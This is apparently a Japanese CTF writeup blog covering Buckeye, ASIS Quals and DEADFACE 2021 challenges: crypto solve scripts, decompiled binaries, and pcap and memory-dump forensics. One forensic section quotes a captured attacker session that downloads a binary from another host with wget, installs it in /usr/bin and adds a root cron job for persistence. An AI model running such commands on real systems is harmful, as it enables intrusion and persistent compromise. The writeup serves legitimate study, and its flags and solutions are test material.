・AES-ECBでFLAGを暗号化し、表示

このことから以下が言える。

A = pow(g, a, p)
B = pow(g, b, p)
→pow(B, a, p) = pow(g, a*b, p) = pow(A, b, p)

bを適当に設定し、Bを算出して指定すれば、shared_secretを計算できる。keyがわかるので、あとはAES-ECB復号すればよい。

#!/usr/bin/env python3
import socket
import hashlib
import Crypto.Util.number as cun
from Crypto.Cipher import AES

def recvuntil(s, tail):
    data = b''
    while True:
        if tail in data:
            return data.decode()
        data += s.recv(1)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('crypto.chall.pwnoh.io', 13374))

data = recvuntil(s, b': ')
p = int(data.split('\n')[4].split(' ')[-1])
g = int(data.split('\n')[5].split(' ')[-1])
A = int(data.split('\n')[6].split(' ')[-1])

b = 2
B = pow(g, b, p)
print(data + str(B))
s.sendall(str(B).encode() + b'\n')
data = recvuntil(s, b'\n').rstrip()
print(data)

ciphertext = bytes.fromhex(data.split(' ')[-1])
shared_secret = pow(A, b, p)
key = hashlib.sha1(cun.long_to_bytes(shared_secret)).digest()[:16]
cipher = AES.new(key, AES.MODE_ECB)
FLAG = cipher.decrypt(ciphertext).decode()
print(FLAG)

実行結果は以下の通り。

I'm going to send you the flag.
However, I noticed that an FBI agent has been eavesdropping on my messages,
so I'm going to send it to you in a way that ONLY YOU can decrypt the flag.

p = 9189089418456474917368747066281973490051965045657384487342558126262412785474286141982009810916885342175667345202133072630938632963164533529501471585186163
g = 5
A = 6191157549707973879955431056050210525324094161570328761336532821597318988065675105666189648260761713541318670962622768609485922408790902433436311152395871
Give me your public key B: 25
ciphertext = 5ffeaa2fc981ff5f2c91758f9452a32545084720b5114c9038cf2bb5f1e10165f2424dd7b97dc02b003c03f63a9f65a61a010f52e610d15163e475d853143771
buckeye{DH_1s_s0_h3ck1ng_c00l_l1k3_wh0_w0uldv3_th0ught_0f_th1s?}
buckeye{DH_1s_s0_h3ck1ng_c00l_l1k3_wh0_w0uldv3_th0ught_0f_th1s?}

Don't Talk to Blue Birds (misc 60)

問題タイトルから考えて、Twitterを探してみる。https://twitter.com/witch_securityを探してみると、pastebinへのリンクがあった。
f:id:satou-y:20211028212523p:plain
このリンクをたどると、以下のページにアクセスできる。

https://pastebin.com/4KHrJcUX

ここにまたURLが貼られている。

https://pastebin.com/qXDb43m1

このURLのアドレスにアクセスしてみると、フラグが書いてあった。

flag{aggre55ive_Hall0we3n_prepArati0ns_Und3rw4y}

ASIS CTF Quals 2021 Writeup

CTF writeup

この大会は2021/10/23 0:00(JST)~2021/10/25 0:00(JST)に開催されました。
今回もチームで参戦。結果は275点で741チーム中77位でした。
自分で解けた問題をWriteupとして書いておきます。

Welcome (Warmup)

ルールのページにフラグが書いてあった。

ASIS{W3lc0me_t0_The_ASIS_CTF_Mad3_w1th_L0ve}

Crypto Warm up (Crypto, Warmup)

暗号化の処理概要は以下の通り。

・l: flagの長さ
・p: 15bit素数
・rstr: p - l の長さのランダムprintable文字列
・msg = flag + rstr
・s: ランダム1024bit整数(is_valid(s, p)(処理は不明)がTrue)
・enc = msg[0]
・i=0~p-2に対して以下を実行
 ・enc += msg[pow(s, i, p)]

暗号化文字列の長さがp。あとはフラグが"ASIS{"から始まることを前提に条件を満たすsを探す。
結果2パターンがあるので、両方についてフラグを求める。

#!/usr/bin/env python3
from Crypto.Util.number import *

with open('output.txt', 'r') as f:
    enc = f.read().rstrip().split(' = ')[1]

p = len(enc)

flag_head = 'ASIS{'

indexes = []
for i in range(2, 5):
    index = []
    j = 0
    while True:
        try:
            j = enc.index(flag_head[i], j)
            index.append(j)
            j += 1
        except:
            break
    indexes.append(index)

ss = []
for s in range(p):
    for i in indexes[0]:
        if pow(s, i - 1, p) == 2:
            for j in indexes[1]:
                if pow(s, j - 1, p) == 3:
                    for k in indexes[2]:
                        if pow(s, k - 1, p) == 4:
                            ss.append(s)

print('[+] s:', ss)

for s in ss:
    flag = 'A'
    i = 1
    while True:
        for j in range(p - 1):
            if pow(s, j, p) == i:
                flag += enc[j + 1]
                break
        if flag[-1] == '}':
            break
        i += 1

    print('[*] flag:', flag)

実行結果は以下の通り。leat文字で意味が通る方がフラグだった。

[+] s: [8562, 10927]
[*] flag: ASIS{_how_dFC.YptZTh1S?h0mx_m4d;_lGD_w;dr\_CUYpI0_5J2T3+?k!!!*Z}
[*] flag: ASIS{_how_d3CrYpt_Th1S_h0m3_m4dE_anD_wEird_CrYp70_5yST3M?!!!!!!}
ASIS{_how_d3CrYpt_Th1S_h0m3_m4dE_anD_wEird_CrYp70_5yST3M?!!!!!!}

Madras (Crypto)

RSA暗号で、nはa, b, cの素因数を持つ。a, b, cに対するいろんな計算結果が出力されているので、それを条件にz3でa, b, cを割り出す。割り出した後は、通常のRSA暗号の復号方法で復号する。

from z3 import *
from Crypto.Util.number import *

with open('output.txt', 'r') as f:
    param1 = int(f.readline().rstrip().split(' ')[-1])
    param2 = int(f.readline().rstrip().split(' ')[-1])
    param3 = int(f.readline().rstrip().split(' ')[-1])
    enc_a = int(f.readline().rstrip().split(' ')[-1])
    enc_b = int(f.readline().rstrip().split(' ')[-1])
    enc_c = int(f.readline().rstrip().split(' ')[-1])
    enc = int(f.readline().rstrip().split(' ')[-1])

a = Int('a')
b = Int('b')
c = Int('c')

s = Solver()

s.add(a * b + c == param1)
s.add(b * c + a == param2)
s.add(c * a + b == param3)
s.add(enc % a == enc_a)
s.add(enc % b == enc_b)
s.add(enc % c == enc_c)

assert s.check() == sat

m = s.model()
a = m[a].as_long()
b = m[b].as_long()
c = m[c].as_long()

print '[+] a =', a
print '[+] b =', b
print '[+] c =', c

assert a.bit_length() == 513 // 3
assert b.bit_length() == 513 // 3
assert c.bit_length() == 513 // 3

e = 65537
n = a * b * c
phi = (a - 1) * (b - 1) * (c - 1)
d = inverse(e, phi)
m = pow(enc, d, n)
FLAG = long_to_bytes(m)
print '[*] FLAG:', FLAG

実行結果は以下の通り。

[+] a = 1644376501336761869533914527999140316946467005479211
[+] b = 2769045283056871559108237639832652911114008081576651
[+] c = 1594118801665580510615541222527591707834932058213541
[*] FLAG: ASIS{m4dRa5_iZ_RSA_l1k3_cH41L3n9E?!!}
ASIS{m4dRa5_iZ_RSA_l1k3_cH41L3n9E?!!}

DEADFACE CTF Writeup

CTF writeup

この大会は2021/10/15 23:00(JST)~2021/10/17 11:00(JST)に開催されました。
今回もチームで参戦。結果は4225点で1195チーム中73位でした。
自分で解けた問題をWriteupとして書いておきます。

Starter (Starter 10)

ルールのページにフラグが書いてあった。

flag{themz_the_ru1es}

Unfinished (Programming 5)

get_flag()の結果を表示させるだけ。

#!/usr/bin/env python3
from binascii import unhexlify as u

def get_flag():
    flag = '666c61677b30682d6c6f6f6b2d612d466c61477d'
    return u(flag).decode('utf-8')


print(f'The flag is: {get_flag()}')

実行結果は以下の通り。

The flag is: flag{0h-look-a-FlaG}
flag{0h-look-a-FlaG}

The Count (Programming 275)

$ nc code.deadface.io 50000
DEADFACE gatekeeper: Let us see how good your programming skills are.
If a = 0, b = 1, c = 2, etc.. Tell me what the sum of this word is:

 You have 5 seconds to give me an answer.

Your word is: fretful

wordの各文字を数値にして合計を答える。

#!/usr/bin/python3
import socket
import string

def recvuntil(s, tail):
    data = b''
    while True:
        if tail in data:
            return data.decode()
        data += s.recv(1)

def get_count(s):
    sum = 0
    for c in s:
        sum += string.ascii_lowercase.index(c)
    return sum

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('code.deadface.io', 50000))

data = recvuntil(s, b'answer.\n').rstrip()
print(data)
data = recvuntil(s, b'\n').rstrip()
print(data)

data = recvuntil(s, b'\n').rstrip()
print(data)
word = data.split(' ')[-1]
ans = get_count(word)
print(ans)
s.sendall(str(ans).encode() + b'\n')
data = recvuntil(s, b'\n').rstrip()
print(data)
data = recvuntil(s, b'\n').rstrip()
print(data)

実行結果は以下の通り。

DEADFACE gatekeeper: Let us see how good your programming skills are.
If a = 0, b = 1, c = 2, etc.. Tell me what the sum of this word is:

 You have 5 seconds to give me an answer.

Your word is: reason
66

flag{d1c037808d23acd0dc0e3b897f344571ddce4b294e742b434888b3d9f69d9944}
flag{d1c037808d23acd0dc0e3b897f344571ddce4b294e742b434888b3d9f69d9944}

Luciafer's Cryptoware IOC 2 (Reverse Engineering 10)

ファイル名が暗号化されているとのこと。シーザー暗号と推測。https://www.geocachingtoolbox.com/index.php?lang=en&page=caesarCipherでファイル名を復号する。

Rotation 3:
charles-a-geschickter-to-dark-angel-01.llabs
flag{charles-a-geschickter-to-dark-angel-01.llabs}

TheZeal0t's Fingerprints Are All Over This! (Reverse Engineering 10)

2つのファイルのSHA-256を答える問題。

$ sha256sum zealotcrypt-02.bin
5a54fb61f7b1a9b1b7405602388add7e3323890bc74952a62803ffb1a535338b  zealotcrypt-02.bin
ctf@ctf-virtual-machine:/mnt/hgfs/Shared$ sha256sum zealotcrypt-02-decrypt.bin  
969102c7feb6003624c4caf0e00fa9a60d96bc503ef0beb71ed4af68ba1fc047  zealotcrypt-02-decrypt.bin

flag{5a54fb61f7b1a9b1b7405602388add7e3323890bc74952a62803ffb1a535338b|969102c7feb6003624c4caf0e00fa9a60d96bc503ef0beb71ed4af68ba1fc047}

Cereal Killer (Reverse Engineering 50)

deadface_re01.binをGhidraでデコンパイルする。

undefined8 main(void)

{
  long lVar1;
  long in_FS_OFFSET;
  byte local_238 [32];
  long local_218;
  int local_210;
  short local_20c;
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  lVar1 = 0;
  do {
    if ((&DAT_00102008)[lVar1] != 0) {
      local_238[lVar1] = (&DAT_00102008)[lVar1] ^ 0x5a;
    }
    lVar1 = lVar1 + 1;
  } while (lVar1 != 0x1f);
  local_238[30] = 0;
  puts("What is the best and sp00kiest breakfast cereal?");
  __printf_chk(1,&DAT_001020ad,"Please enter the passphrase: ");
  __isoc99_scanf(&DAT_001020ad,&local_218);
  if (((local_218 == 0x68632d746e753063) && (local_210 == 0x6c756330)) && (local_20c == 0x61)) {
    puts((char *)local_238);
  }
  else {
    puts("notflag{you-guessed-it---this-is-not-the-flag}");
  }
  if (local_10 == *(long *)(in_FS_OFFSET + 0x28)) {
    return 0;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail();
}

比較している部分をデコードする。

>>> '68632d746e753063'.decode('hex')[::-1]
'c0unt-ch'
>>> '6c756330'.decode('hex')[::-1]
'0cul'
>>> '61'.decode('hex')[::-1]
'a'

実行して、パスフレーズ"c0unt-ch0cula"を入力する。

$ ./deadface_re01.bin 
What is the best and sp00kiest breakfast cereal?
Please enter the passphrase: c0unt-ch0cula
flag{c0unt-ch0cula-cereal-FTW}

flag{c0unt-ch0cula-cereal-FTW}

TheZeal0t's Cryptoware IOC 1 (Reverse Engineering 100)

pcapからネットワークIoCを答える問題。Wiresharkでパケットをキャプチャしながら、実行する。
http://insidious.deadface.io/zealotcrypt-aes-key.txtをGETしていることがわかる。

・Host: insidious.deadface.io
・User-Agent: DEADFACE_LLABS_CRYPTOWARE/6.69
・Accept-Encoding: gzip
flag{insidious.deadface.io}

Cereal Killer 2 (Reverse Engineering 300)

>re02.exe
hlS4MbOmA+kQX71xXwPs7CsCWp9jQxCPa/oMk2o2bZr+jgweD4b8u80z5LVoBqC7
$ file re02.exe
re02.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows

dnSpyでデコンパイルする。

using System;
using System.Security.Cryptography;
using System.Text;

// Token: 0x02000002 RID: 2
public static class SymmetricEncryptor
{
	// Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000450
	public static void Main(string[] args)
	{
		Console.WriteLine("hlS4MbOmA+kQX71xXwPs7CsCWp9jQxCPa/oMk2o2bZr+jgweD4b8u80z5LVoBqC7");
	}

	// Token: 0x06000002 RID: 2 RVA: 0x0000205C File Offset: 0x0000045C
	public static byte[] EncryptString(string toEncrypt)
	{
		byte[] array = new byte[]
		{
			5,
			18,
			61,
			44,
			125,
			34,
			247,
			90,
			155,
			149,
			103,
			142,
			219,
			199,
			5,
			231
		};
		byte[] result;
		using (Aes aes = Aes.Create())
		{
			using (ICryptoTransform cryptoTransform = aes.CreateEncryptor(array, array))
			{
				byte[] bytes = Encoding.UTF8.GetBytes(toEncrypt);
				result = cryptoTransform.TransformFinalBlock(bytes, 0, bytes.Length);
			}
		}
		return result;
	}

	// Token: 0x06000003 RID: 3 RVA: 0x000020E4 File Offset: 0x000004E4
	public static string DecryptFromBase64ToString(string base64Encrypted)
	{
		byte[] encryptedData = Convert.FromBase64String(base64Encrypted);
		return SymmetricEncryptor.DecryptToString(encryptedData);
	}

	// Token: 0x06000004 RID: 4 RVA: 0x00002100 File Offset: 0x00000500
	public static string DecryptToString(byte[] encryptedData)
	{
		byte[] array = new byte[]
		{
			5,
			18,
			61,
			44,
			125,
			34,
			247,
			90,
			155,
			149,
			103,
			142,
			219,
			199,
			5,
			231
		};
		string @string;
		using (Aes aes = Aes.Create())
		{
			using (ICryptoTransform cryptoTransform = aes.CreateDecryptor(array, array))
			{
				byte[] bytes = cryptoTransform.TransformFinalBlock(encryptedData, 0, encryptedData.Length);
				@string = Encoding.UTF8.GetString(bytes);
			}
		}
		return @string;
	}

	// Token: 0x06000005 RID: 5 RVA: 0x00002188 File Offset: 0x00000588
	private static byte[] GetKey(string password)
	{
		byte[] bytes = Encoding.UTF8.GetBytes(password);
		byte[] result;
		using (MD5 md = MD5.Create())
		{
			result = md.ComputeHash(bytes);
		}
		return result;
	}

	// Token: 0x04000001 RID: 1
	private static string password = "f1ag{you-didnt-think-it-was-that-easy-did-you}";
}

AES暗号を使って暗号化していて、key, ivもわかっているので、復号する。

from Crypto.Cipher import AES
import base64

array = [5, 18, 61, 44, 125, 34, 247, 90, 155, 149, 103, 142, 219, 199, 5, 231]
key = ''.join(map(chr, array))
iv = key

enc = 'hlS4MbOmA+kQX71xXwPs7CsCWp9jQxCPa/oMk2o2bZr+jgweD4b8u80z5LVoBqC7'
enc = base64.b64decode(enc)

cipher = AES.new(key, AES.MODE_CBC, iv)
flag = cipher.decrypt(enc)
print flag

flag{frank3n-berry-goodness-NOM-NOM-NOM}

Monstrum ex Machina (Traffic Analysis 30)

被害者は検索エンジンを使って名前を調べられていた。この被害者の名前を答える問題。httpでフィルタリングし、さらに"GET /search"で検索すると、以下のパケットが見つかる。

GET /search?ct=17&pn=0&tn=ikaslist&rn=10&lm=0&ie=utf-8&word=%22charles%20geschickter%22 HTTP/1.1\r\n
flag{Charles Geschickter}

The SUM of All FEARS (Traffic Analysis 50)

拡張子を除くファイル名が同一のexeとbinがダウンロードされていて、そのMD5を答える問題。
ftpでフィルタリングすると、/TOOLS/lytton-crypt.binと/TOOLS/lytton-crypt.binをRETRコマンドで取得していることがわかる。ftp-dataでフィルタリングして、この2つのファイルの分割ファイルをエクスポートし、結合する。

$ cat lytton-crypt.exe* > lytton-crypt.exe
$ cat lytton-crypt.bin* > lytton-crypt.bin
$ md5sum lytton-crypt.exe
9cb9b11484369b95ce35904c691a5b28  lytton-crypt.exe
$ md5sum lytton-crypt.bin
4da8e81ee5b08777871e347a6b296953  lytton-crypt.bin

flag{9cb9b11484369b95ce35904c691a5b28|4da8e81ee5b08777871e347a6b296953}

Release the Crackin'! (Traffic Analysis 50)

victimのパスワードを答える問題。ftpでフィルタリングし、lytton-crypt.binを取得しているセッションでTCP Streamを見ると、以下のようになっている。

USER cgeschickter
331 Password required
PASS darkangel
230 User logged in.
flag{darkangel}

Luciafer, You Clever Little Devil! (Traffic Analysis 50)

victimのコンピュータにログインしたレスポンスのあったパケット番号を答える問題。ftpでログイン成功した「Response: 230 User logged in.」というメッセージがあったパケット番号を答える。

flag{159765}

Luciafer's Fatal Error (Traffic Analysis 50)

ハッカーが持つべきではないプログラムを実行しているようで、そのプログラムのMD5を答える問題。
httpでフィルタリングすると、No.160446のパケットで、/secret_decoder.binをGETしている。エクスポートし、MD5を確認する。

$ md5sum secret_decoder.bin   
42e419a6391ca79dc44d7dcef1efc83b  secret_decoder.bin

flag{42e419a6391ca79dc44d7dcef1efc83b}

Scanners (Traffic Analysis 100)

被害者のマシンで開いている16384未満のTCPポート番号を答える問題。
被害者のマシンは192.168.100.103。Wiresharkで[統計]>[対話]を見てみる。そこで192.168.100.103へのTCP接続で通信量が0より大きいもののポート番号を答えればよい。

flag{21,135,139,445,3389}

Persistence Pays Off (Traffic Analysis 100)

ハッカーは永続性を実現するためのコマンドを発行しているので、その該当するパケット番号を答える問題。
.exeで検索していくと、以下のTCP Streamが見つかった。



hostname
dungeon
whoami
luciafer
sudo -l
Matching Defaults entries for luciafer on dungeon:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User luciafer may run the following commands on dungeon:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL


sudo wget -O /usr/bin/ll-connect.bin http://192.168.100.105/secret_decoder.bin
--2021-08-22 17:55:35--  http://192.168.100.105/secret_decoder.bin
Connecting to 192.168.100.105:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 194 [application/octet-stream]
Saving to: '/usr/bin/ll-connect.bin'

     0K                                                       100% 57.2M=0s

2021-08-22 17:55:35 (57.2 MB/s) - '/usr/bin/ll-connect.bin' saved [194/194]

sudo chmod 755 /usr/bin/ll-connect.bin
sudo /bin/bash -c "echo '*/5 * * * * root /usr/bin/ll-connect.bin' > /etc/cron.d/da-ll-backup-job"★


cat /etc/cron.d/da-ll-backup-job
*/5 * * * * root /usr/bin/ll-connect.bin

cd /home/luciafer
ls -al 
total 21216
drwxr-xr-x 18 luciafer luciafer     4096 Aug 22 17:44 .
drwxr-xr-x  4 root     root         4096 Aug 21 20:29 ..
-rw-------  1 luciafer luciafer        0 Aug 21 20:43 .ICEauthority
-rw-------  1 luciafer luciafer      106 Aug 22 17:21 .Xauthority
-rw-------  1 luciafer luciafer     3186 Aug 22 17:21 .bash_history
-rw-r--r--  1 luciafer luciafer      220 Aug 21 20:29 .bash_logout
-rw-r--r--  1 luciafer luciafer     5349 Aug 21 20:29 .bashrc
-rw-r--r--  1 luciafer luciafer     3526 Aug 21 20:29 .bashrc.original
drwxr-xr-x 10 luciafer luciafer     4096 Aug 22 17:21 .cache
drwx------ 10 luciafer luciafer     4096 Aug 21 22:37 .config
-rw-r--r--  1 luciafer luciafer       55 Aug 21 21:07 .dmrc
-rw-r--r--  1 luciafer luciafer    11759 Aug 21 20:29 .face
lrwxrwxrwx  1 luciafer luciafer        5 Aug 21 20:29 .face.icon -> .face
drwx------  3 luciafer luciafer     4096 Aug 21 20:43 .gnupg
drwxr-xr-x  3 luciafer luciafer     4096 Aug 21 20:43 .local
drwx------  5 luciafer luciafer     4096 Aug 21 20:50 .mozilla
-rw-r--r--  1 luciafer luciafer      807 Aug 21 20:29 .profile
drwx------  2 luciafer luciafer     4096 Aug 21 20:56 .ssh
drwxr-xr-x  4 luciafer luciafer     4096 Aug 21 22:37 .wine
-rw-------  1 luciafer luciafer     9735 Aug 22 17:51 .xsession-errors
-rw-------  1 luciafer luciafer    10046 Aug 22 17:21 .xsession-errors.old
-rw-r--r--  1 luciafer luciafer    10605 Aug 21 20:29 .zshrc
drwxr-xr-x  2 luciafer luciafer     4096 Aug 21 20:43 Desktop
drwxr-xr-x  2 luciafer luciafer     4096 Aug 21 20:43 Documents
drwxr-xr-x  2 luciafer luciafer     4096 Aug 21 20:43 Downloads
drwxr-xr-x  5 luciafer luciafer     4096 Aug 21 21:21 LLDUMP
drwxr-xr-x  2 luciafer luciafer     4096 Aug 21 20:43 Music
drwxr-xr-x  2 luciafer luciafer     4096 Aug 21 20:43 Pictures
drwxr-xr-x  2 luciafer luciafer     4096 Aug 21 20:43 Public
drwxr-xr-x  2 luciafer luciafer     4096 Aug 21 20:43 Templates
drwxr-xr-x  2 luciafer luciafer     4096 Aug 21 20:43 Videos
-rw-r--r--  1 luciafer luciafer   578908 Aug 21 22:16 da-warning-message.jpg
-rw-r--r--  1 luciafer luciafer       65 Aug 21 22:29 da-warning.txt
-rw-------  1 luciafer luciafer 20867868 Aug 21 22:30 luciafer-packet-capture.pcapng
-rw-r--r--  1 root     root       105984 Aug 21 23:16 lytton-crypt-recovered.exe
-rwxr-xr-x  1 luciafer luciafer      194 Aug 22 17:43 secret_decoder.bin


echo DF7148BA7B69C3A27D85F78114E5A7C907A103CF0103B86C040983F593C6F016 > da-warning.txt
wget -O da-warning-message.jpg http://192.168.100.105/da-warning-message.jpg
--2021-08-22 17:57:03--  http://192.168.100.105/da-warning-message.jpg
Connecting to 192.168.100.105:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 578908 (565K) [image/jpeg]
Saving to: 'da-warning-message.jpg'

     0K .......... .......... .......... .......... ..........  8%  123M 0s
    50K .......... .......... .......... .......... .......... 17% 89.4M 0s
   100K .......... .......... .......... .......... .......... 26%  392M 0s
   150K .......... .......... .......... .......... .......... 35%  242M 0s
   200K .......... .......... .......... .......... .......... 44%  110M 0s
   250K .......... .......... .......... .......... .......... 53%  411M 0s
   300K .......... .......... .......... .......... .......... 61%  384M 0s
   350K .......... .......... .......... .......... .......... 70%  468M 0s
   400K .......... .......... .......... .......... .......... 79%  431M 0s
   450K .......... .......... .......... .......... .......... 88%  414M 0s
   500K .......... .......... .......... .......... .......... 97%  429M 0s
   550K .......... .....                                      100%  333M=0.002s

2021-08-22 17:57:03 (225 MB/s) - 'da-warning-message.jpg' saved [578908/578908]

該当するパケット番号を答える。

flag{160468}

A Warning (Traffic Analysis 150)

httpでフィルタリングする。No.160536で/da-warning-message.jpgをGETしている。このjpgをエクスポートする。
f:id:satou-y:20211021123957j:plain
画像にフラグが書いてあった。

flag{angels-fear-to-tread}

Blood Bash (Forensics 10)

$ ssh bl0ody_mary@bloodbash.deadface.io -p 22
The authenticity of host 'bloodbash.deadface.io (164.90.158.159)' can't be established.
ECDSA key fingerprint is SHA256:n2x0TCmZ4LxU0LLlQ0jkx/Uin/f3mSFLjKPR15n0zC0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'bloodbash.deadface.io,164.90.158.159' (ECDSA) to the list of known hosts.
bl0ody_mary@bloodbash.deadface.io's password: 
bl0ody_mary@d2c158885ddc:~$ ls -la
total 68
drwxr-xr-x 1 bl0ody_mary bl0ody_mary  4096 Sep 16 12:51  .
drwxr-xr-x 1 root        root         4096 Sep 14 19:15  ..
-rw------- 1 bl0ody_mary bl0ody_mary     1 Sep 16 14:44  .bash_history
-rw-r--r-- 1 bl0ody_mary bl0ody_mary   220 Sep 14 19:15  .bash_logout
-rw-r--r-- 1 bl0ody_mary bl0ody_mary  3771 Sep 14 19:15  .bashrc
-rw-r--r-- 1 bl0ody_mary bl0ody_mary   807 Sep 14 19:15  .profile
-rw-r--r-- 1 bl0ody_mary bl0ody_mary 12444 Sep 14 20:20 'De Monne Customer Portal.pdf'
drwxr-xr-x 2 bl0ody_mary bl0ody_mary  4096 Sep 14 19:16  Documents
drwxr-xr-x 2 bl0ody_mary bl0ody_mary  4096 Sep 14 19:15  Downloads
drwxr-xr-x 2 bl0ody_mary bl0ody_mary  4096 Sep 14 19:15  Music
drwxr-xr-x 2 bl0ody_mary bl0ody_mary  4096 Sep 14 19:15  Pictures
drwxr-xr-x 2 bl0ody_mary bl0ody_mary  4096 Sep 14 19:15  Videos
bl0ody_mary@d2c158885ddc:~$ pwd  
/home/bl0ody_mary
bl0ody_mary@d2c158885ddc:~$ find . -name flag1.txt
./Documents/flag1.txt
bl0ody_mary@d2c158885ddc:~$ cat ./Documents/flag1.txt
flag{cd134eb8fbd794d4065dcd7cfa7efa6f3ff111fe}

flag{cd134eb8fbd794d4065dcd7cfa7efa6f3ff111fe}

Blood Bash 2 (Forensics 15)

$ ssh bl0ody_mary@bloodbash.deadface.io -p 22
bl0ody_mary@bloodbash.deadface.io's password: 
bl0ody_mary@14c2a89a26e9:~$ ls -lRa
.:
total 68
drwxr-xr-x 1 bl0ody_mary bl0ody_mary  4096 Sep 16 12:51  .
drwxr-xr-x 1 root        root         4096 Sep 14 19:15  ..
-rw------- 1 bl0ody_mary bl0ody_mary     1 Sep 16 14:44  .bash_history
-rw-r--r-- 1 bl0ody_mary bl0ody_mary   220 Sep 14 19:15  .bash_logout
-rw-r--r-- 1 bl0ody_mary bl0ody_mary  3771 Sep 14 19:15  .bashrc
-rw-r--r-- 1 bl0ody_mary bl0ody_mary   807 Sep 14 19:15  .profile
-rw-r--r-- 1 bl0ody_mary bl0ody_mary 12444 Sep 14 20:20 'De Monne Customer Portal.pdf'
drwxr-xr-x 2 bl0ody_mary bl0ody_mary  4096 Sep 14 19:16  Documents
drwxr-xr-x 2 bl0ody_mary bl0ody_mary  4096 Sep 14 19:15  Downloads
drwxr-xr-x 2 bl0ody_mary bl0ody_mary  4096 Sep 14 19:15  Music
drwxr-xr-x 2 bl0ody_mary bl0ody_mary  4096 Sep 14 19:15  Pictures
drwxr-xr-x 2 bl0ody_mary bl0ody_mary  4096 Sep 14 19:15  Videos

./Documents:
total 20
drwxr-xr-x 2 bl0ody_mary bl0ody_mary 4096 Sep 14 19:16 .
drwxr-xr-x 1 bl0ody_mary bl0ody_mary 4096 Sep 16 12:51 ..
-rw-r--r-- 1 bl0ody_mary bl0ody_mary   47 Sep 14 19:16 .demonne_info.txt
-rw-r--r-- 1 bl0ody_mary bl0ody_mary   47 Sep 14 19:16 flag1.txt

./Downloads:
total 12
drwxr-xr-x 2 bl0ody_mary bl0ody_mary 4096 Sep 14 19:15 .
drwxr-xr-x 1 bl0ody_mary bl0ody_mary 4096 Sep 16 12:51 ..

./Music:
total 12
drwxr-xr-x 2 bl0ody_mary bl0ody_mary 4096 Sep 14 19:15 .
drwxr-xr-x 1 bl0ody_mary bl0ody_mary 4096 Sep 16 12:51 ..

./Pictures:
total 12
drwxr-xr-x 2 bl0ody_mary bl0ody_mary 4096 Sep 14 19:15 .
drwxr-xr-x 1 bl0ody_mary bl0ody_mary 4096 Sep 16 12:51 ..

./Videos:
total 12
drwxr-xr-x 2 bl0ody_mary bl0ody_mary 4096 Sep 14 19:15 .
drwxr-xr-x 1 bl0ody_mary bl0ody_mary 4096 Sep 16 12:51 ..
$ cat ./Documents/.demonne_info.txt
flag{a856b162978fe563537c6890cb184c48fc2a018a}

flag{a856b162978fe563537c6890cb184c48fc2a018a}

Window Pains (Forensics 30)

メモリダンプからOS, bit version、イメージの日付を答える問題。

$ volatility -f physmemraw imageinfo
Volatility Foundation Volatility Framework 2.6.1
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win10x64_19041
                     AS Layer1 : SkipDuplicatesAMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/mnt/hgfs/Shared/work/physmemraw)
                      PAE type : No PAE
                           DTB : 0x1aa000L
                          KDBG : 0xf8005e600b20L
          Number of Processors : 4
     Image Type (Service Pack) : 0
                KPCR for CPU 0 : 0xfffff8005ba60000L
                KPCR for CPU 1 : 0xffff82804f9c0000L
                KPCR for CPU 2 : 0xffff82804f5e8000L
                KPCR for CPU 3 : 0xffff82804f7ca000L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2021-09-07 14:57:44 UTC+0000
     Image local date and time : 2021-09-07 07:57:44 -0700

flag{Windows10_64_20210907145744}

Window Pains 2 (Forensics 50)

メモリダンプからコンピュータ名を答える問題。

$ volatility -f physmemraw --profile=Win10x64_19041 envars | grep COMPUTERNAME
Volatility Foundation Volatility Framework 2.6.1
     568 wininit.exe          0x000002760e625ed0 COMPUTERNAME                   DESKTOP-IT8QNRI
                :
                :

flag{DESKTOP-IT8QNRI}

Blood Bash 4 (Forensics 200)

bl0ody_mary@8aa5d57a62dd:~$ xxd De\ Monne\ Customer\ Portal.pdf 
00000000: 2550 4446 2d31 2e36 0d25 e2e3 cfd3 0d0a  %PDF-1.6.%......
00000010: 3131 2030 206f 626a 0d3c 3c2f 4c69 6e65  11 0 obj.<</Line
00000020: 6172 697a 6564 2031 2f4c 2031 3234 3434  arized 1/L 12444
00000030: 2f4f 2031 332f 4520 3832 3832 2f4e 2031  /O 13/E 8282/N 1
00000040: 2f54 2031 3231 3431 2f48 205b 2034 3338  /T 12141/H [ 438
00000050: 2031 3435 5d3e 3e0d 656e 646f 626a 0d20   145]>>.endobj. 
00000060: 2020 2020 2020 2020 2020 2020 2020 2020                  
00000070: 2020 0d0a 3136 2030 206f 626a 0d3c 3c2f    ..16 0 obj.<</
00000080: 4465 636f 6465 5061 726d 733c 3c2f 436f  DecodeParms<</Co
00000090: 6c75 6d6e 7320 332f 5072 6564 6963 746f  lumns 3/Predicto
000000a0: 7220 3132 3e3e 2f46 696c 7465 722f 466c  r 12>>/Filter/Fl
000000b0: 6174 6544 6563 6f64 652f 4944 5b3c 3032  ateDecode/ID[<02
000000c0: 4633 3538 3939 3343 3144 3134 3445 3843  F358993C1D144E8C
000000d0: 4636 4432 4632 4132 3739 4143 3446 3e3c  F6D2F2A279AC4F><
000000e0: 3145 4232 4642 3139 3239 3144 4344 3444  1EB2FB19291DCD4D
000000f0: 3938 3339 3737 3135 3943 3941 3735 3936  983977159C9A7596
00000100: 3e5d 2f49 6e64 6578 5b31 3120 375d 2f49  >]/Index[11 7]/I
00000110: 6e66 6f20 3130 2030 2052 2f4c 656e 6774  nfo 10 0 R/Lengt
00000120: 6820 3336 2f50 7265 7620 3132 3134 322f  h 36/Prev 12142/
00000130: 526f 6f74 2031 3220 3020 522f 5369 7a65  Root 12 0 R/Size
00000140: 2031 382f 5479 7065 2f58 5265 662f 575b   18/Type/XRef/W[
